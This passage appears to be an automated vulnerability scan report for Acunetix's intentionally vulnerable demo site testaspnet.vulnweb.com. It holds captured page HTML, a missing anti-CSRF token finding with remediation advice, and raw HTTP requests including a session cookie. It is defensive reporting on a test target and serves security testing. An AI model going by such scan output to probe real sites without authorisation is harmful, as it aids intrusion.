          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        14. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a 